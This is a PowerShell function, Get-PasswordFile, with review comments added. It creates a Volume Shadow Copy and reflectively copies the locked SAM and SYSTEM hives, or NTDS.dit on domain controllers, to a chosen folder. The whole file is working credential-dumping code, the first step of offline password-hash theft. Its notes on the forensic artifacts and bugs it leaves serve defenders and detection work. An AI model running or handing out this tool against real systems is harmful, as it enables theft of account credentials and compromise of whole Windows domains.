function Get-PasswordFile {
<#
.SYNOPSIS

Copies either the SAM or NTDS.dit and system files to a specified directory.

.DESCRIPTION

Requires an elevated (Administrator) session. Makes sure the Volume Shadow Copy
service ("vss") is able to run, creates a "ClientAccessible" shadow copy of the
drive that holds the credential store, and copies the locked files out of the
shadow volume with a reflective call to the non-public
Microsoft.Win32.Win32Native.CopyFile. On a domain controller
(Win32_ComputerSystem.DomainRole greater than 3) NTDS.dit and the SYSTEM hive are
copied; on any other host the SAM and SYSTEM hives are.

.PARAMETER DestinationPath

Specifies the directory to the location where the password files are to be copied.
The directory must already exist (validated with Test-Path -PathType Container).
The files are written as "<DestinationPath>\sam", "<DestinationPath>\system" or
"<DestinationPath>\ntds".

.OUTPUTS

None or an object representing the copied items (the Get-ChildItem result of each
file written by Copy-RawItem).

.EXAMPLE

Get-PasswordFile "c:\temp"

.NOTES

Read defensively, every step of this function leaves an observable artifact: the
vss service start mode and state are changed, a Win32_ShadowCopy instance is
created from a script host (and is never deleted here), mscorlib internals are
reached by reflection, and on-disk copies of the SAM/NTDS.dit and SYSTEM hives
appear under DestinationPath. The vss state restore at the end only runs on the
success path; the early Return after a failed shadow copy and any exception thrown
by Copy-RawItem skip it.
#>

[CmdletBinding()]
Param
(
[Parameter(Mandatory = $true, Position = 0)]
[ValidateScript({Test-Path $_ -PathType 'Container'})]
[ValidateNotNullOrEmpty()]
[String]
$DestinationPath
)

#Define Copy-RawItem helper function from http://gallery.technet.microsoft.com/scriptcenter/Copy-RawItem-Private-NET-78917643
# Copies a single file by calling the Win32 CopyFile wrapper inside mscorlib
# through reflection instead of Copy-Item; presumably needed because the shadow
# volume's DeviceObject path is not addressable through the FileSystem provider —
# verify. Throws a ComponentModel.Win32Exception on a reported copy failure and
# otherwise writes the Get-ChildItem result for $Destination to the pipeline.
function Copy-RawItem
{

[CmdletBinding()]
[OutputType([System.IO.FileSystemInfo])]
Param (
# Source file path (passed straight to CopyFile, no provider resolution).
[Parameter(Mandatory = $True, Position = 0)]
[ValidateNotNullOrEmpty()]
[String]
$Path,

# Destination file path.
[Parameter(Mandatory = $True, Position = 1)]
[ValidateNotNullOrEmpty()]
[String]
$Destination,

# When set, an existing destination file makes CopyFile fail instead of overwrite.
[Switch]
$FailIfExists
)

# Get a reference to the internal method - Microsoft.Win32.Win32Native.CopyFile()
# NOTE(review): assumes the .NET Framework layout (Windows PowerShell) where
# mscorlib.dll is loaded and exposes Microsoft.Win32.Win32Native; this lookup is
# not expected to hold on PowerShell 7 / .NET Core — confirm before relying on it.
$mscorlib = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ($_.Location.Split('\')[-1] -eq 'mscorlib.dll')}
$Win32Native = $mscorlib.GetType('Microsoft.Win32.Win32Native')
$CopyFileMethod = $Win32Native.GetMethod('CopyFile', ([Reflection.BindingFlags] 'NonPublic, Static'))

# Perform the copy
# Static method, so the instance argument is $null; the switch is coerced to [Bool].
$CopyResult = $CopyFileMethod.Invoke($null, @($Path, $Destination, ([Bool] $PSBoundParameters['FailIfExists'])))

# Despite the name this is the Win32 last-error code, not an HRESULT. It is only
# meaningful if the invoked method preserves the last error — TODO confirm.
$HResult = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()

# NOTE(review): a failed copy that leaves the last-error at 0 falls into the else
# branch and runs Get-ChildItem on a destination that may not exist.
if ($CopyResult -eq $False -and $HResult -ne 0)
{
# An error occured. Display the Win32 error set by CopyFile
throw ( New-Object ComponentModel.Win32Exception )
}
else
{
Write-Output (Get-ChildItem $Destination)
}
}

#Check for admin rights
# Elevation is required for the shadow copy creation and the hive reads below.
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Error "Not running as admin. Run the script with elevated credentials"
Return
}

#Get "vss" service startup type
# The original start mode is remembered so it can be restored at the end.
$VssStartMode = (Get-WmiObject -Query "Select StartMode From Win32_Service Where Name='vss'").StartMode
if ($VssStartMode -eq "Disabled") {Set-Service vss -StartUpType Manual}

#Get "vss" Service status and start it if not running
# Only an exact "Stopped" status is restored later; other non-running states
# (e.g. Paused) are started here but not put back.
$VssStatus = (Get-Service vss).status
if ($VssStatus -ne "Running") {Start-Service vss}

#Check to see if we are on a DC
# Win32_ComputerSystem.DomainRole: 4 = backup domain controller, 5 = primary
# domain controller; anything lower is a workstation or member/standalone server.
$DomainRole = (Get-WmiObject Win32_ComputerSystem).DomainRole
$IsDC = $False
if ($DomainRole -gt 3) {
$IsDC = $True
# Locate the AD database from the NTDS service parameters so the shadow copy is
# taken of the drive that actually holds it.
$NTDSLocation = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\services\NTDS\Parameters)."DSA Database File"
# Substring(0,3) assumes a drive-letter form such as "C:\"; a volume GUID or
# mount-point path would break this — TODO confirm.
$FileDrive = ($NTDSLocation).Substring(0,3)
} else {$FileDrive = $Env:HOMEDRIVE + '\'}

#Create a volume shadow filedrive
# WMI Win32_ShadowCopy.Create with the "ClientAccessible" context; the resulting
# shadow copy is never deleted by this function.
$WmiClass = [WMICLASS]"root\cimv2:Win32_ShadowCopy"
$ShadowCopy = $WmiClass.create($FileDrive, "ClientAccessible")
$ReturnValue = $ShadowCopy.ReturnValue

# NOTE(review): this Return skips the vss restore at the bottom of the function,
# so a failed shadow copy leaves the service in its modified state.
if ($ReturnValue -ne 0) {
Write-Error "Shadow copy failed with a value of $ReturnValue"
Return
}

#Get the DeviceObject Address
# The DeviceObject is the raw device path of the snapshot; the hive paths below
# are joined onto it.
$ShadowID = $ShadowCopy.ShadowID
$ShadowVolume = (Get-WmiObject Win32_ShadowCopy | Where-Object {$_.ID -eq $ShadowID}).DeviceObject

#If not a DC, copy System and SAM to specified directory
if ($IsDC -ne $true) {

$SamPath = Join-Path $ShadowVolume "\Windows\System32\Config\sam"
$SystemPath = Join-Path $ShadowVolume "\Windows\System32\Config\system"

#Utilizes Copy-RawItem from Matt Graeber
# A trailing backslash on $DestinationPath yields a doubled separator here.
# An exception from Copy-RawItem propagates and skips the vss restore below.
Copy-RawItem $SamPath "$DestinationPath\sam"
Copy-RawItem $SystemPath "$DestinationPath\system"
} else {

#Else copy the NTDS.dit and system files to the specified directory
$NTDSPath = Join-Path $ShadowVolume "\Windows\NTDS\NTDS.dit"
$SystemPath = Join-Path $ShadowVolume "\Windows\System32\Config\system"

Copy-RawItem $NTDSPath "$DestinationPath\ntds"
Copy-RawItem $SystemPath "$DestinationPath\system"
}

#Return "vss" service to previous state
# Only reached on the success path (no try/finally); see the early Return above.
If ($VssStatus -eq "Stopped") {Stop-Service vss}
If ($VssStartMode -eq "Disabled") {Set-Service vss -StartupType Disabled}
}